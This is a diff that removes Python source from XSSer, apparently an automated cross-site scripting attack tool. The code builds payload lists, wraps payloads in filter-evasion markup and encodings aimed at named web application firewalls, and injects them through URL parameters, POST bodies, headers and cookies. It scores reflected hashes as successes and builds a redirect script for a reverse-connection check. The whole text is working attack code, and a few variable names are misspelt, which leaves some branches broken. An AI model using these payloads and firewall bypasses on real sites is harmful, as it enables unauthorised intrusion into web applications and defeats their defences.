-        checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
-        # heuristic parameters
-        heuristic_params = core.fuzzing.heuristic.heuristic_test
-        def enable_options_heuristic(payloads):
-            if options.heuristic:
-                payloads = heuristic_params + payloads
-                if options.dom:
-                    payloads = payloads + payloads_dom
-            return payloads
-        if options.fuzz:
-            payloads = payloads_fuzz
-            if options.dcp:
-                payloads = payloads + payloads_dcp
-                if options.script:
-                    payloads = payloads + manual_payload
-                    if options.hash:
-                        payloads = checker_payload + payloads
-                        if options.inducedcode:
-                            payloads = payloads + payloads_httpsr
-                            if options.heuristic:
-                                payloads = heuristic_params + payloads
-                                if options.dom:
-                                    payloads = payloads + payloads_dom
-                    elif options.inducedcode:
-                        payloads = payloads + payloads_httpsr
-                        if options.heuristic:
-                            payloads = heuristic_params + payloads
-                            if options.dom:
-                                payloads = payloads + payloads_dom
-                        elif options.dom:
-                            payloads = payloads + payloads_dom
-                    elif options.heuristic:
-                        payloads = heuristic_params + payloads
-                        if options.dom:
-                            payloads = payloads + payloads_dom
-                    elif options.dom:
-                        payloads = payloads + payloads_dom
-                elif options.hash:
-                    payloads = checker_payload + payloads
-                    if options.inducedcode:
-                        payloads = payloads + payloads_httpsr
-                        if options.heuristic:
-                            payloads = heuristic_params + payloads
-                            if options.dom:
-                                payloads = payloads + payloads_dom
-                        elif options.dom:
-                            payloads = payloads + payloads_dom
-                elif options.inducedcode:
-                    payloads = payloads + payloads_httpsr
-                    if options.heuristic:
-                        payloads = heuristic_params + payloads
-                        if options.dom:
-                            payloads = payloads + payloads_dom
-                    elif options.dom:
-                        payloads = payloads + payloads_dom
-            elif options.script:
-                payloads = payloads + manual_payload
-                if options.hash:
-                    payloads = checker_payload + payloads
-                    if options.inducedcode:
-                        payloads = payaloads + payloads_httpsr
-                        if options.heuristic:
-                            payloads = heuristic_params + payloads
-                            if options.dom:
-                                payloads = payloads + payloads_dom
-            elif options.hash:
-                payloads = checker_payload + payloads
-                if options.inducedcode:
-                    payloads = payloads + payloads_httpsr
-                    if options.heuristic:
-                        payloads = heuristic_params + payloads
-                        if options.dom:
-                            payloads = payloads + payloads_dom
-                    elif options.dom:
-                        payloads = payloads + payloads_dom
-                elif options.heuristic:
-                    payloads = heuristic_params + payloads
-                    if options.dom:
-                        payloads = payloads + payloads_dom
-                elif options.dom:
-                    payloads = payloads + payloads_dom
-            elif options.inducedcode:
-                payloads = payloads + payloads_httpsr
-                if options.hash:
-                    payloads = checker_payload + payloads
-                    if options.heuristic:
-                        payloads = heuristic_params + payloads
-                        if options.dom:
-                            payloads = payloads + payloads_dom
-                    elif options.dom:
-                        payloads = payloads + payloads_dom
-            elif options.heuristic:
-                payloads = heuristic_params + payloads
-                if options.dom:
-                    payloads = payloads + payloads_dom
-            elif options.dom:
-                payloads = payloads + payloads_dom
-        elif options.dcp:
-            payloads = payloads_dcp
-            if options.script:
-                payloads = payloads + manual_payload
-                if options.hash:
-                    payloads = checker_payload + payloads
-                    if options.inducedcode:
-                        payloads = payloads + payloads_httpsr
-                        if options.heuristic:
-                            payloads = heuristic_params + payloads
-                            if options.dom:
-                                payloads = payloads + payloads_dom
-            elif options.hash:
-                payloads = checker_payload + payloads
-                if options.inducedcode:
-                    payloads = payloads + inducedcode
-                    if options.heuristic:
-                        payloads = heuristic_params + payloads
-                        if options.dom:
-                            payloads = payloads + payloads_dom
-                    elif options.dom:
-                        payloads = payloads + payloads_dom
-            elif options.inducedcode:
-                payloads = payloads + payloads_httpsr
-                if options.heuristic:
-                    payloads = heuristic_params + payloads
-                    if options.dom:
-                        payloads = payloads + payloads_dom
-                elif options.dom:
-                    payloads = payloads + payloads_dom
-            elif options.heuristic:
-                payloads = heuristic_params + payloads
-                if options.dom:
-                    payloads = payloads + payloads_dom
-            elif options.dom:
-                payloads = payloads + payloads_dom
-        elif options.script:
-            payloads = manual_payload
-            if options.hash:
-                payloads = checker_payload + payloads
-                if options.inducedcode:
-                    payloads = payloads + payloads_httpsr
-                    if options.heuristic:
-                        payloads = heuristic_params + payloads
-                        if options.dom:
-                            payloads = payloads + payloads_dom
-            elif options.inducedcode:
-                payloads = payloads + payloads_httpsr
-                if options.heuristic:
-                    payloads = heuristic_params + payloads
-                    if options.dom:
-                        payloads = payloads + payloads_dom
-                elif options.dom:
-                    payloads = payloads + payloads_dom
-            elif options.heuristic:
-                payloads = heuristic_params + payloads
-                if options.dom:
-                    paylaods = payloads + payloads_dom
-            elif options.dom:
-                payloads = payloads + payloads_dom
-        elif options.inducedcode:
-            payloads = payloads_httpsr
-            if options.hash:
-                payloads = checker_payload + payloads
-                if options.heuristic:
-                    payloads = heuristic_params + payloads
-                    if options.dom:
-                        payloads = payloads + payloads_dom
-            elif options.heuristic:
-                payloads = heuristic_params + payloads
-                if options.dom:
-                    payloads = payloads + payloads_dom
-            elif options.dom:
-                payloads = payloads + payloads_dom
-        elif options.heuristic:
-            payloads = heuristic_params
-            if options.hash:
-                payloads = checker_payload + payloads
-                if options.dom:
-                    payloads = payloads + payloads_dom
-            elif options.dom:
-                payloads = payloads + payloads_dom
-        elif options.dom:
-            payloads = payloads_dom
-        elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
-            payloads = [{"payload":'">PAYLOAD',
-			 "browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
-                         }]
-        else:
-            payloads = checker_payload
-        return payloads
-
-    def process_ipfuzzing(self, text):
-        """
-        Mask ips in given text to DWORD
-        """
-        ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
-        for ip in ips:
-            text = text.replace(ip, str(self._ipDwordEncode(ip)))
-        return text
-
-    def process_ipfuzzing_octal(self, text):
-        """
-       	Mask ips in given text to Octal
-	    """
-        ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
-        for ip in ips:
-            text = text.replace(ip, str(self._ipOctalEncode(ip)))
-        return text
-
-    def process_payloads_ipfuzzing(self, payloads):
-        """
-        Mask ips for all given payloads using DWORD
-        """
-        # ip fuzzing (DWORD)
-        if self.options.Dwo:
-            resulting_payloads = []
-            for payload in payloads:
-                payload["payload"] = self.process_ipfuzzing(payload["payload"])
-                resulting_payloads.append(payload)
-            return resulting_payloads
-        return payloads
-
-    def process_payloads_ipfuzzing_octal(self, payloads):
-        """
-        Mask ips for all given payloads using OCTAL
-        """
-        # ip fuzzing (OCTAL)
-        if self.options.Doo:
-            resulting_payloads = []
-            for payload in payloads:
-                payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
-                resulting_payloads.append(payload)
-            return resulting_payloads
-        return payloads
-
-    def get_query_string(self):
-        """
-        Get the supplied query string.
-        """
-        if self.options.postdata:
-            return self.options.postdata
-        elif self.options.getdata:
-            return self.options.getdata
-        return ""
-
-    def attack_url(self, url, payloads, query_string):
-        """
-        Attack the given url checking or not if is correct.
-        """
-        if self.options.nohead:
-            for payload in payloads:
-                self.attack_url_payload(url, payload, query_string)
-        else:
-            hc = Curl()
-            try:
-                urls = hc.do_head_check([url])
-            except:
-                print "Target url: (" + url + ") is malformed" + " [DISCARDED]" + "\n"
-                return
-            if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
-                if str(hc.info()["http-code"]) in ["301"]:
-                    url = str(hc.info()["Location"])
-                    payload = ""
-                    query_string = ""
-                elif str(hc.info()["http-code"]) in ["302"]:
-                    url = url + "/"
-                    payload = ""
-                    query_string = ""
-                self.success_connection = self.success_connection + 1
-                print "\n[Info] HEAD alive check for the target: (" + url + ") is OK " + "(" + hc.info()["http-code"] + ") [AIMED]\n"
-                for payload in payloads:
-                    self.attack_url_payload(url, payload, query_string)
-            else:
-                if str(hc.info()["http-code"]) in ["405"]:
-                    print "\n[Info] HEAD alive check for the target: (" + url + ") is NOT ALLOWED (" + hc.info()["http-code"] + ") [PASSING]" + "\n"                
-                    self.success_connection = self.success_connection + 1
-                    for payload in payloads:
-                        self.attack_url_payload(url, payload, query_string)
-                else:
-                    self.not_connection = self.not_connection + 1
-                    print "\n[Info] HEAD alive check for the target: (" + url + ") is FAILED (" + hc.info()["http-code"] + ") [DISCARDED]" + "\n"
-
-    def get_url_payload(self, url, payload, query_string, attack_payload=None):
-        """
-        Attack the given url with the given payload
-        """
-        options = self.options
-        self._ongoing_attacks = {}
-
-        # get payload/vector
-        payload_string = payload['payload'].strip()
-        
-        ### Anti-antiXSS exploits #### 18/02/2016  ### 
-        # PHPIDS (>0.6.5) [ALL] -> 32*payload + payload
-        if options.phpids065:
-            payload_string = 32*payload_string + payload_string
-
-        # PHPIDS (>0.7) [ALL] -> payload: 'svg-onload'
-        if options.phpids070:
-            payload_string = '<svg+onload=+"'+payload_string+'">'
-
-        # Imperva Incapsula [ALL] -> payload: 'img onerror' + payload[DoubleURL+HTML+Unicode]
-        if options.imperva:
-            payload_string = '<img src=x onerror="'+payload_string+'">'
-
-        # WebKnight (>4.1) [Chrome] payload: 'details ontoggle'
-        if options.webknight:
-            payload_string = '<details ontoggle='+payload_string+'>'
-
-        # F5BigIP [Chrome+FF+Opera] payload: 'onwheel'
-        if options.f5bigip:
-            payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
-
-        # Barracuda WAF [ALL] payload: 'onwheel'
-        if options.barracuda:
-            payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
-
-        # Apache / modsec [ALL] payload: special
-        if options.modsec:
-            payload_string = '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover='+payload_string+'>'
-
-        # QuickDefense [Chrome] payload: 'ontoggle' + payload[Unicode]
-        if options.quickdefense:
-            payload_string = '<details ontoggle="'+payload_string+'">'
-
-        # substitute the attack hash
-        url_orig_hash = self.generate_hash('url')
-        if 'XSS' in payload_string or 'PAYLOAD' in payload_string or 'VECTOR' in payload_string:
-            payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
-            payload_string = payload_string.replace('VECTOR', self.DEFAULT_XSS_PAYLOAD)
-            hashed_payload = payload_string.replace('XSS', url_orig_hash)
-        elif "1" in payload_string:
-            url_orig_hash = self.generate_numeric_hash()
-            hashed_payload = payload_string.replace('1', url_orig_hash) # adding numeric XSS (ex: alert('1'))
-        else:
-            print "\n[Error] You aren't using a valid keyword: 'XSS', '1', 'PAYLOAD', 'VECTOR'... for your --payload. Aborting...\n"
-            print("="*75 + "\n") 
-            sys.exit(2)
-
-        if options.imperva:
-            hashed_payload = urllib.urlencode({'':hashed_payload})
-            hashed_payload = urllib.urlencode({'':hashed_payload}) #DoubleURL encoding
-            hashed_payload = cgi.escape(hashed_payload) # + HTML encoding
-            hashed_payload = unicode(hashed_payload) # + Unicode
-
-        if options.quickdefense:
-            hashed_payload = unicode(hashed_payload) # + Unicode
-
-        if attack_payload:
-            # url for real attack
-            hashed_vector_url = self.encoding_permutations(attack_payload)
-        else:
-            # test
-            hashed_vector_url = self.encoding_permutations(hashed_payload)
-
-        self._ongoing_attacks['url'] = url_orig_hash
-
-        if not options.getdata: # using GET as a single input (-u)
-            target_url = url
-        else:
-            if not options.postdata: # using GET provided by parameter (-g)
-                if not url.endswith("/") and not options.getdata.startswith("/"):
-                    url = url + "/"
-                target_url = url + options.getdata
-        p_uri = urlparse(target_url)
-        uri = p_uri.netloc
-        path = p_uri.path
-        if not uri.endswith('/') and not path.startswith('/'):
-            uri = uri + "/"
-        target_params = parse_qs(urlparse(target_url).query, keep_blank_values=True)
-        if not target_params: # just an url pased (ex: -u 'http://example.com')
-            payload_url = query_string.strip() + hashed_vector_url
-            dest_url = p_uri.scheme + "://" + uri + path + payload_url
-        else:
-            for key, value in target_params.iteritems(): # parse params searching for keywords
-                for v in value:
-                    if v == 'XSS': # input keywords to inject payload
-                        target_params[key] = hashed_vector_url
-                        url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
-                        hashed_payload = payload_string.replace('XSS', url_orig_hash)
-                        hashed_vector_url = self.encoding_permutations(hashed_payload)
-                    else:
-                        target_params[key] = v
-            payload_url = query_string.strip() + hashed_vector_url
-            target_url_params = urllib.urlencode(target_params)
-            dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
-        if options.postdata: # using POST provided by parameter (-p)
-            target_params = parse_qs(query_string, keep_blank_values=True)
-            for key, value in target_params.iteritems(): # parse params searching for keywords
-                for v in value:
-                    if v == 'XSS': # input keywords to inject payload
-                        target_params[key] = hashed_vector_url
-                        url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
-                        hashed_payload = payload_string.replace('XSS', url_orig_hash)
-                        hashed_vector_url = self.encoding_permutations(hashed_payload)
-                    else:
-                        target_params[key] = v
-            target_url_params = urllib.urlencode(target_params)
-            dest_url = target_url_params
-        return dest_url, url_orig_hash
-
-    def attack_url_payload(self, url, payload, query_string):
-        if not self.pool:
-            pool = self.mothership.pool
-        else:
-            pool = self.pool
-        c= Curl()
-        def _cb(request, result):
-            self.finish_attack_url_payload(c, request, result, payload,
-                                           query_string, url, newhash)
-        _error_cb = self.error_attack_url_payload
-        def _error_cb(request, error):
-            self.error_attack_url_payload(c, url, request, error)
-        if self.options.getdata or not self.options.postdata:
-            dest_url, newhash = self.get_url_payload(url, payload, query_string)
-            if (self.options.xsa or self.options.xsr or self.options.coo):
-                agent, referer, cookie = self._prepare_extra_attacks(payload) 
-                c.agent = agent
-                c.referer = referer
-                c.cookie = cookie
-            pool.addRequest(c.get, [[dest_url]], _cb, _error_cb)
-            self._ongoing_requests += 1
-        if self.options.postdata:
-            dest_url, newhash = self.get_url_payload("", payload, query_string)
-            dest_url = dest_url.strip().replace("/", "", 1)
-            if (self.options.xsa or self.options.xsr or self.options.coo):
-                agent, referer, cookie = self._prepare_extra_attacks(payload)
-                c.agent = agent
-                c.referer = referer
-                c.cookie = cookie
-            pool.addRequest(c.post, [[url, dest_url]], _cb, _error_cb)
-            self._ongoing_requests += 1
-
-    def error_attack_url_payload(self, c, url, request, error):
-        self._ongoing_requests -= 1
-        for reporter in self._reporters:
-            reporter.mosquito_crashed(url, str(error[0]))
-        dest_url = request.args[0]
-        self.report("Failed attempt (URL Malformed!?): " + url + "\n")
-        self.urlmalformed = True
-        if self.urlmalformed == True and self.urlspoll[0] == url:
-            self.land()
-        self.report(str(error[0]))
-        if DEBUG:
-            traceback.print_tb(error[2])
-        c.close()
-        del c
-        return
-
-    def finish_attack_url_payload(self, c, request, result, payload,
-                                  query_string, url, orig_hash):
-        self.report('='*75)
-        self.report("Target: " + url + " --> " + str(self.time))
-        self.report('='*75 + "\n")
-        self._ongoing_requests -= 1
-        dest_url = request.args[0]
-        # adding constant head check number flag
-        if self.options.isalive:
-            self.flag_isalive_num = int(self.options.isalive)
-
-        if self.options.isalive <= 0:
-            pass
-
-        elif self.options.isalive and self.options.nohead:
-            self.errors_isalive = self.errors_isalive + 1
-            if self.errors_isalive > self.options.isalive:
-                pass
-            else:
-                self.report("---------------------")
-                self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
-            if self.next_isalive == True:
-                hc = Curl()
-                self.next_isalive = False
-                try:
-                    urls = hc.do_head_check([url])
-                except:
-                    print "Target url: (" + url + ") is unaccesible" + " [DISCARDED]" + "\n"
-                    self.errors_isalive = 0
-                    return
-                if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
-                    print "HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n"
-                    print "- Your target still Alive: " + "(" + url + ")"
-                    print "- If you are receiving continuous 404 errors requests on your injections but your target is alive is because:\n"
-                    print "          - your injections are failing: normal :-)"
-                    print "          - maybe exists some IPS/NIDS/... systems blocking your requests!\n"
-                else:
-                    if str(hc.info()["http-code"]) == "0":
-                        print "\nTarget url: (" + url + ") is unaccesible" + " [DISCARDED]" + "\n"
-                    else:
-                        print "HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n"
-                        print "- Your target " + "(" + url + ")" + " looks that is NOT alive"
-                        print "- If you are receiving continuous 404 errors requests on payloads\n  and this HEAD pre-check request is giving you another 404\n  maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target try to; STOP THIS TEST!!\n"
-                self.errors_isalive = 0
-            else:
-                if str(self.errors_isalive) >= str(self.options.isalive):
-                    self.report("---------------------")
-                    self.report("\nAlive System: XSSer is checking if your target still alive. [Waiting for reply...]\n")
-                    self.next_isalive = True
-                    self.options.isalive = self.flag_isalive_num
-        else:
-            if self.options.isalive and not self.options.nohead:
-                self.report("---------------------")
-                self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
-                self.report("---------------------")
-
-        # check results an alternative url, choosing method and parameters, or not
-        if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
-            self.options.altm = "GET"
-        if self.options.altm == "post":
-            self.options.altm = "POST"
-        if self.options.alt == None:
-            pass
-        else:
-            self.report("="*45)
-            self.report("[+] Checking Response Options:", "\n")
-            self.report("[+] Url:", self.options.alt)
-            self.report("[-] Method:", self.options.altm)
-            if self.options.ald:
-                self.report("[-] Parameter(s):", self.options.ald, "\n")
-            else:
-                self.report("[-] Parameter(s):", query_string, "\n")
-
-        # perform normal injection
-        if c.info()["http-code"] in ["200", "302", "301"]:
-            if self.options.statistics:
-                self.success_connection = self.success_connection + 1
-            self._report_attack_success(c, dest_url, payload,
-                                        query_string, url, orig_hash)
-        else:
-            self._report_attack_failure(c, dest_url, payload,
-                                        query_string, url, orig_hash)
-
-        # checking response results 
-        if self.options.alt == None:
-            pass
-        else:
-            self.report("="*45)
-            self.report("[+] Checking Response Results:", "\n")
-            self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url")
-            if 'PAYLOAD' in payload['payload']:
-                user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash)
-            if self.options.ald:
-                query_string = self.options.ald
-            if "VECTOR" in self.options.alt:
-                dest_url = self.options.alt
-            else:
-                if not dest_url.endswith("/"):
-                    dest_url = dest_url + "/"
-            if self.options.altm == 'POST':
-                dest_url = "" + query_string + user_attack_payload
-                dest_url = dest_url.strip().replace("/", "", 1)
-                if (self.options.xsa or self.options.xsr or self.options.coo):
-                    agent, referer, cookie = self._prepare_extra_attacks(payload)
-                    c.agent = agent
-                    c.referer = referer
-                    c.cookie = cookie
-                data = c.post(url, dest_url)
-            else:
-                dest_url = self.options.alt + query_string + user_attack_payload
-                if (self.options.xsa or self.options.xsr or self.options.coo):
-                    agent, referer, cookie = self._prepare_extra_attacks(payload)
-                    c.agent = agent
-                    c.referer = referer
-                    c.cookie = cookie
-                c.get(dest_url)
-
-        # perform check response injection
-            if c.info()["http-code"] in ["200", "302", "301"]:
-                if self.options.statistics:
-                    self.success_connection = self.success_connection + 1
-                self._report_attack_success(c, dest_url, payload,
-                                            query_string, url, orig_hash)
-            else:
-                self._report_attack_failure(c, dest_url, payload,
-                                            query_string, url, orig_hash)
- 
-        c.close()
-        del c
-
-    def encoding_permutations(self, enpayload_url):
-        """
-        Perform encoding permutations on the url and query_string.
-        """
-        options = self.options
-        if options.Cem: 
-            enc_perm = options.Cem.split(",")
-            for _enc in enc_perm:
-                enpayload_url   = self.encmap[_enc](enpayload_url)
-        else: 
-            for enctype in self.encmap.keys():
-                if getattr(options, enctype):
-                    enpayload_url   = self.encmap[enctype](enpayload_url)
-        return enpayload_url
-
-    def _report_attack_success(self, curl_handle, dest_url, payload,\
-                               query_string, orig_url, url_orig_hash):
-        """
-        report success of an attack
-        """
-        if not orig_url in self.successfull_urls:
-            self.successfull_urls.append(orig_url)
-        options = self.options
-        self.report("-"*45)
-        if payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]" or payload['browser'] == "[Heuristic test]":
-            pass
-        else:
-            self.report("[-] Hashing: " + url_orig_hash)
-        if payload['browser'] == "[Heuristic test]":
-            self.report("[+] Checking: " + str(payload['payload']).strip('XSS'))
-        else:
-            if options.postdata:
-                self.report("[+] Trying: " + dest_url.strip(), "(POST:", query_string + ")")
-            else:
-                self.report("[+] Trying: " + urllib.unquote(dest_url.strip()))
-        if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
-            pass
-        else:
-            self.report("[+] Browser Support: " + payload['browser'])
-        
-	# statistics injections counters
-        if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
-            self.check_positives = self.check_positives + 1
-        elif payload['browser']=="[Data Control Protocol Injection]":
-            self.dcp_injection = self.dcp_injection + 1
-        elif payload['browser']=="[Document Object Model Injection]":
-            self.dom_injection = self.dom_injection + 1
-        elif payload['browser']=="[Induced Injection]":
-            self.httpsr_injection = self.httpsr_injection + 1
-        elif payload['browser']=="[manual_injection]":
-            self.manual_injection = self.manual_injection + 1
-        else:
-            self.auto_injection = self.auto_injection +1
-
-        if options.verbose:
-            self.report("[-] Headers Results:\n")
-            self.report(curl_handle.info())
-            # if you need more data about your connection(s), uncomment this two lines:
-            #self.report("[-] Body Results:\n")
-            #self.report(curl_handle.body())
-            self.report("-"*45)
-        
-            if payload['browser']=="[Heuristic test]":
-                pass
-            else:
-                self.report("[-] Injection Results:")
-
-        # check attacks success
-        for attack_type in self._ongoing_attacks:
-            hashing = url_orig_hash
-            # checking heuristic responses
-            if payload['browser']=="[Heuristic test]":
-                heuristic_param = str(payload['payload']).strip('XSS')
-                heuristic_string = str(hashing)
-                if heuristic_string in curl_handle.body():
-                    # ascii
-                    if heuristic_param == "\\":
-                        self.heuris_backslash_found = self.heuris_backslash_found + 1
-                    # / is the same on ASCII and Unicode
-                    elif heuristic_param == "/":
-                        self.heuris_slash_found = self.heuris_slash_found + 1
-                        self.heuris_une_slash_found = self.heuris_une_slash_found + 1
-                    elif heuristic_param == ">":
-                        self.heuris_mayor_found = self.heuris_mayor_found + 1
-                    elif heuristic_param == "<":
-                        self.heuris_minor_found = self.heuris_minor_found + 1
-                    elif heuristic_param == ";":
-                        self.heuris_semicolon_found = self.heuris_semicolon_found + 1
-                    elif heuristic_param == "'":
-                        self.heuris_colon_found = self.heuris_colon_found + 1
-                    elif heuristic_param == '"':
-                        self.heuris_doublecolon_found = self.heuris_doublecolon_found + 1
-                    elif heuristic_param == "=":
-                        self.heuris_equal_found = self.heuris_equal_found + 1
-                    # une
-                    elif heuristic_param == "%5C":
-                        self.heuris_une_backslash_found = self.heuris_une_backslash_found + 1
-                    elif heuristic_param == "%3E":
-                        self.heuris_une_mayor_found = self.heuris_une_mayor_found + 1
-                    elif heuristic_param == "%3C":
-                        self.heuris_une_minor_found = self.heuris_une_minor_found + 1
-                    elif heuristic_param == "%3B":
-                        self.heuris_une_semicolon_found = self.heuris_une_semicolon_found + 1
-                    elif heuristic_param == "%27":
-                        self.heuris_une_colon_found = self.heuris_une_colon_found + 1
-                    elif heuristic_param == "%22":
-                        self.heuris_une_doublecolon_found = self.heuris_une_doublecolon_found + 1
-                    elif heuristic_param == "%3D":
-                        self.heuris_une_equal_found = self.heuris_une_equal_found + 1
-                    # dec
-                    elif heuristic_param == "&#92":
-                        self.heuris_dec_backslash_found = self.heuris_dec_backslash_found + 1
-                    elif heuristic_param == "&#47":
-                        self.heuris_dec_slash_found = self.heuris_dec_slash_found + 1
-                    elif heuristic_param == "&#62":
-                        self.heuris_dec_mayor_found = self.heuris_dec_mayor_found + 1
-                    elif heuristic_param == "&#60":
-                        self.heuris_dec_minor_found = self.heuris_dec_minor_found + 1
-                    elif heuristic_param == "&#59":
-                        self.heuris_dec_semicolon_found = self.heuris_dec_semicolon_found + 1
-                    elif heuristic_param == "&#39":
-                        self.heuris_dec_colon_found = self.heuris_dec_colon_found + 1
-                    elif heuristic_param == "&#34":
-                        self.heuris_dec_doublecolon_found = self.heuris_dec_doublecolon_found + 1
-                    elif heuristic_param == "&#61":
-                        self.heuris_dec_equal_found = self.heuris_dec_equal_found + 1	
-                    self.add_success(dest_url, payload, hashing, query_string, orig_url, attack_type)
-                else:
-                    if heuristic_param == "\\":
-                        self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
-                    elif heuristic_param == "/":
-                        self.heuris_slash_notfound = self.heuris_slash_notfound + 1
-                    elif heuristic_param == ">":
-                        self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
-                    elif heuristic_param == "<":
-                        self.heuris_minor_notfound = self.heuris_minor_notfound + 1
-                    elif heuristic_param == ";":
-                        self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
-                    elif heuristic_param == "'":
-                        self.heuris_colon_notfound = self.heuris_colon_notfound + 1
-                    elif heuristic_param == '"':
-                        self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
-                    elif heuristic_param == "=":
-                        self.heuris_equal_notfound = self.heuris_equal_notfound + 1
-            else:
-                # only add a success if hashing is on body and we have a 200OK
-                if hashing in curl_handle.body() and str(curl_handle.info()["http-code"]) == "200":
-                    # some anti false positives manual checkers
-                    if 'PAYLOAD' in payload['payload']:
-                        user_attack_payload = payload['payload'].replace('PAYLOAD', url_orig_hash)
-                        if str(options.discode) in curl_handle.body(): # provided by user
-                            self.report("[!] Reply contains 'discode' provided... forcing failure!\n")
-                            self.add_failure(dest_url, payload, hashing, query_string, attack_type)
-                        else:
-                            if str('/&gt;' + hashing) in curl_handle.body() or str('href=' + dest_url + hashing) in curl_handle.body() or str('content=' + dest_url + hashing) in curl_handle.body(): # provided by XSSer experience
-                                self.report("[!] Reply looks a false positive from here. Try to inject it manually for check results... discarding!\n")
-                                self.add_failure(dest_url, payload, hashing, query_string, attack_type)
-                            else:
-                                if options.discode:
-                                    self.report("[+] Reply does not contain 'discode' provided... adding!\n")
-                                self.add_success(dest_url, payload, hashing, query_string, orig_url, attack_type)
-                else:
-                    self.add_failure(dest_url, payload, hashing, query_string, attack_type)
-
-    def add_failure(self, dest_url, payload, hashing, query_string, method='url'):
-        """
-        Add an attack that failed to inject
-        """
-        if payload['browser'] == "[Heuristic test]":
-            pass
-        else:
-            self.report("[+] Checking: " + method + " attack with " + payload['payload'] + "... fail\n")
-        options = self.options
-        for reporter in self._reporters:
-            reporter.add_failure(dest_url)
-        if options.script:
-            self.hash_notfound.append((dest_url, "Manual injection", method, hashing))
-        else:
-            self.hash_notfound.append((dest_url, payload['browser'], method, hashing))
-        if options.verbose:
-            self.report("Searching hash: " + hashing + " in target source code...\n")
-            self.report("Injection failed!\n")
-
-    def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
-        """
-        Add an attack that managed to inject the code
-        """
-        if payload['browser'] == "[manual_injection]":
-            self.report("[+] Checking: " + method + " attack with " + payload['payload'].strip() + "... ok\n")
-        elif payload['browser'] == "[Heuristic test]":
-            pass
-        else:
-            self.report("[+] Checking: " + method + " attack with " + payload['payload'].strip() + "... ok\n")
-        for reporter in self._reporters:
-            reporter.add_success(dest_url)
-        if self.options.reversecheck:
-            if self.options.dcp or self.options.inducedcode or self.options.dom:
-                pass
-            else:
-                self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
-        self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
-        if self.options.verbose:
-            self.report("Searching hash: " + hashing + " in target source code...\n")
-            self.report("This injection is reflected by target so can be a vulnerability!! :)\n")
-            self.report("Try --reverse-check connection to certify that is 100% vulnerable\n")
-
-    def do_token_check(self, orig_url, hashing, payload, query_string, dest_url):
-        self.report("[-] Trying reverse connection from:", orig_url + query_string)
-        if "VECTOR" in orig_url:
-            dest_url = orig_url
-        else:
-            if not dest_url.endswith("/"):
-                dest_url = dest_url + "/"
-            dest_url = orig_url + query_string + payload['payload']
-
-        tok_url = None
-        self_url = "http://localhost:19084/success/" + hashing
-        shadow_js_inj = "document.location=document.location.hash.substring(1)"
-        shadow_inj = "<script>" + shadow_js_inj + "</script>"
-        shadow_js_inj = shadow_js_inj
-        dest_url = dest_url.split("#")[0]
-
-        def requote(what):
-            return urllib.quote_plus(what)
-        vector_and_payload = payload['payload']
-        _e = self.encoding_permutations
-        if 'VECTOR' in dest_url:
-            dest_url = dest_url.replace('VECTOR', vector_and_payload)
-        if '">PAYLOAD' in dest_url:
-            tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
-            tok_url += '#' + self_url
-        elif "'>PAYLOAD" in dest_url:
-            tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
-            tok_url += '#' + self_url
-        elif "javascript:PAYLOAD" in dest_url:
-            tok_url = dest_url.replace('javascript:PAYLOAD',
-                                       self.encoding_permutations("window.location='" + self_url+"';"))
-            tok_url = dest_url.replace("javascript:PAYLOAD",
-                                       _e("javascript:" + shadow_js_inj))
-            tok_url+= '#' + self_url
-        elif '"PAYLOAD"' in dest_url:
-            tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
-        elif "'PAYLOAD'" in dest_url:
-            tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
-        elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
-            tok_url = dest_url.replace('PAYLOAD', self_url)
-        elif "SCRIPT" in dest_url:
-            tok_url = dest_url.replace('PAYLOAD',
-                                      shadow_js_inj)
-            tok_url += '#' + self_url
-        elif 'onerror="PAYLOAD"' in dest_url:
-            tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
-            tok_url+= '#' + self_url
-        elif 'onerror="javascript:PAYLOAD"' in dest_url:
-            tok_url = dest_url.replace('javascript:PAYLOAD',
-            				self.encoding_permutations("window.location='" + self_url+"';"))
